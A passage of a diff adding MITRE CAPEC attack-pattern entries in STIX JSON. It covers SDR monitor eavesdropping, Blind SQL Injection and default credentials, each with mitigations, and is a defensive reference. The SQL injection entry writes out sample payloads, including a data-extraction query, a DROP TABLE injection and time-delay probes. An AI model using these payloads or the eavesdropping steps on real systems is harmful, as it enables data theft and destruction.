"created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b4cc5c1-0de0-4e6e-a975-3e437ac753f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61c1c9ea-6c17-4290-ab72-aadec28bff84", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If applicable, confirm extensions/plugins are properly signed by the official developers.", + "id": "course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--641cc0bb-be70-4115-883e-a3f03bff4bbc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For web browsers, close sessions when finished to prevent malicious extensions/plugins from executing the the background.", + "id": 
"course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5730515f-d9bc-4ea4-96f5-1c85449fe63a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An Adversary can eavesdrop on the content of an external monitor through the air without modifying any cable or installing software, just capturing this signal emitted by the cable or video port, with this the attacker will be able to impact the confidentiality of the data without being detected by traditional security tools", + "external_references": [ + { + "external_id": "CAPEC-699", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/699.html" + }, + { + "external_id": "CWE-1300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1300.html" + }, + { + "description": "TempestSDR: An SDR Tool For Eavesdropping on Computer Screens Via Unintentionally Radiated RF", + "external_id": "REF-744", + "source_name": "reference_from_CAPEC", + "url": "https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/" + }, + { + "description": "Dan Maloney, Exposing Computer Monitor 
Side-Channel Vulnerabilities with TempestSDR", + "external_id": "REF-745", + "source_name": "reference_from_CAPEC", + "url": "https://hackaday.com/2020/07/15/exposing-computer-monitor-side-channel-vulnerabilities-with-tempestsdr/" + } + ], + "id": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Eavesdropping on a Monitor", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey Target: The adversary surveys the target location, looking for exposed display cables and locations to hide an SDR. This also includes looking for display cables or monitors placed close to a wall, where the SDR can be in range while behind the wall. The adversary also attempts to discover the resolution and refresh rate of the targeted display.

Experiment

  1. Find target using SDR: The adversary sets up an SDR near the target display cable or monitor. They use the SDR software to locate the corresponding frequency of the display cable. This is done by looking for interference peaks that change depending on what the screen is showing. The adversary notes down the possible frequencies of unintentional emission.

  2. Techniques
    An adversary can make use of many different commercially available SDR devices which are easy to setup such as a HackRF, Ubertooth, RTL-SDR, and many others.

Exploit

  1. Visualize Monitor Image: Once the SDR software has been used to identify the target, the adversary will record the transmissions and visualize the monitor image using these transmissions, which allows them to eavesdrop on the information visible on the monitor.

  2. Techniques
    The TempestSDR software can be used in conjunction an SDR device to visualize the monitor image. The adversary will specify the known monitor resolution and refresh rate, or if those are not known they can use the provided auto-correlation graphs to help predict these values. The adversary will then try the different frequencies recorded from the experiment phase, looking for a viewing monitor display. Low pass filters and gain can be manipulated to make the display image clearer.
", + "x_capec_extended_description": "\n This attack gives the adversary the ability to view an external monitor with an insignificant delay. There is also no indicator of compromise from the victim visible on the monitor.\n The eavesdrop is possible due to a signal leakage, that is produced at different points of the connection, including the source port, the connection between the cable and PC, the cable itself, and the connection between the cable and the monitor. That signal leakage can be captured near any of the leak points, but also in a near location, like the next room or a few meters away, using an SDR (Software-defined Radio) device and the correspondent software, that process and interpret the signal to show attackers what the monitor is displaying.\n From the victim’s point of view, this specified attack might cause a high risk, and from the other hand, from the attacker’s point of view, the attack is excellent, since the specified attack method can be used without investing too much effort or require too many skills, as long as the right attack tool is in right place, this allows attackers to completely compromise the confidentiality of the data; also giving the attacker the advantage of being undetectable by not only traditional security products but also from bug sweep because the SDR device is acting in passive mode.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Victim should use an external monitor device", + "Physical access to the target location and devices" + ], + "x_capec_resources_required": [ + "SDR device set with the correspondent antenna", + "Computer with SDR Software" + ], + "x_capec_skills_required": { + "Low": "Understanding of computing hardware, to identify the video cable and video ports", + "Medium": "Knowledge of how to use the SDR and related software: With this knowledge, the adversary will find the correct frequency where the signal is being leaked" + }, + "x_capec_status": "Draft", + 
"x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enhance: Increase the number of electromagnetic shield layers in the display ports and cables to contain or reduce the intensity of the leaked signal.", + "id": "course-of-action--6861ed58-d0bb-4b79-a234-6d3871f68301", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f81ec05a-9f11-45a6-867c-62b54d1514de", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6861ed58-d0bb-4b79-a234-6d3871f68301", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use a protocol that encrypts the video signal; in case the signal is intercepted the signal is protected by the encryption.", + "id": "course-of-action--afe1a16a-adf0-4319-8534-47f561dfe668", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4096526b-50da-47c2-b008-add63b02b1e8", 
+ "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--afe1a16a-adf0-4319-8534-47f561dfe668", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Lock away the video cables, making it difficult for the attacker to access the cables and place the antenna near them (If the distance condition between the antenna and display port/cable is not satisfied, the attack will not be possible).", + "id": "course-of-action--32e62a1f-c22b-463f-86b4-d5399aa93ac5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11be0074-5b6a-47ce-b412-6e814aaf3a56", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32e62a1f-c22b-463f-86b4-d5399aa93ac5", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use wireless technologies to connect to external display devices.", + "id": "course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8", + "modified": "2023-01-24T00:00:00.000Z", + 
"name": "coa-699-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5917544d-819a-4682-88b3-e6997f7efc51", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. 
Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.", + "external_references": [ + { + "external_id": "CAPEC-7", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/7.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Blind SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_SQL_Injection" + } + ], + "id": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Blind SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary may try entering something like \"username' AND 1=1; --\" in an input 
field. If the result is the same as when the adversary entered \"username\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:\n \"username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108\".\n If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:\n \"username'; DROP TABLE trades; --\n ", + "In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. See also: CVE-2006-4705" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. [Hypothesize SQL queries in application]Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:\n \"SELECT * FROM orders WHERE ordernum = _____\"or\"SELECT * FROM orders WHERE ordernum IN (_____)\"or\"SELECT * FROM orders WHERE ordernum in (_____) ORDER BY _____\"\n Of course, there are many other possibilities.\n

  2. Techniques
    Research types of SQL queries and determine which ones could be used at various places in an application.
  3. [Determine how to inject information into the queries]Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:\n \"5' OR 1=1; --\"and\"5) OR 1=1; --\"and\"ordernum DESC; --\"\n

  4. Techniques
    Add clauses to the SQL queries such that the query logic does not change.
    Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY '0:0:10' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.
  3. Determine database type: Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries

  4. Techniques
    Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)
    Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)
    Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not).

Exploit

  1. Extract information about database schema: Extract information about database schema by getting the database to answer yes/no questions about the schema.

  2. Techniques
    Automatically extract database schema using a tool such as Absinthe.
    Manually perform the blind SQL Injection to extract desired information about the database schema.
  3. Exploit SQL Injection vulnerability: Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database

  4. Techniques
    Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.", + "id": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-7-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8e7946c-f260-48f6-8601-b5bd6d149921", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e9617f-1737-408d-9e05-97402a6101c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "spec_version": "2.1", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. 
\"secret\" or \"password\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.", + "external_references": [ + { + "external_id": "CAPEC-70", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/70.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Valid Accounts:Default Accounts", + "external_id": "T1078.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078/001" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Risks of Default Passwords on the Internet, 2016--10---07, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-574", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA13-175A" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project 
(OWASP)", + "external_id": "REF-596", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-597", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.html" + } + ], + "id": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Try Common or Default Usernames and Passwords", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user sets their password to \"123\" or intentionally leaves their password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. 
Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.", + "Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \"root\" with a password \"password\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288", + "In April 2019, adversaries attacked several popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. An investigation conducted by the Microsoft Security Resposne Center (MSRC) discovered that these devices were used to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device. [REF-572]" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.The adversary has the means to interact with the system." + ], + "x_capec_resources_required": [ + "Technology or vendor specific list of default usernames and passwords." + ], + "x_capec_skills_required": { + "Low": "An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Delete all default account credentials that may be put in by the product vendor.", + "id": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-70-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ae690da-8edd-49c2-92c4-8f09f6f23cd6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac1c094b-9c14-4717-9353-911a46460f08", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcdf171c-f44d-4397-8365-c74fb76197ea", + "modified": 
"2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3139771b-b483-4f77-b9ab-79ab1c9eafbe", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary which has gained elevated access to network boundary devices may use these devices to create a channel to bridge trusted and untrusted networks. 
Boundary devices do not necessarily have to be on the network’s edge, but rather must serve to segment portions of the target network the adversary wishes to cross into.", + "external_references": [ + { + "external_id": "CAPEC-700", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/700.html" + }, + { + "description": "Network Boundary Bridging", + "external_id": "T1599", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1599" + }, + { + "description": "CISA, Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, 2018--04---16", + "external_id": "REF-746", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + } + ], + "id": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Network Boundary Bridging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Alter Execution Logic", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Alter Execution Logic", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In November 2016, a Smart Install Exploitation Tool was released online which takes advantage of Cisco’s unauthenticated SMI management protocol to download a target’s current configuration files. Adversaries can use this tool to overwrite files to modify the device configurations, or upload maliciously modified 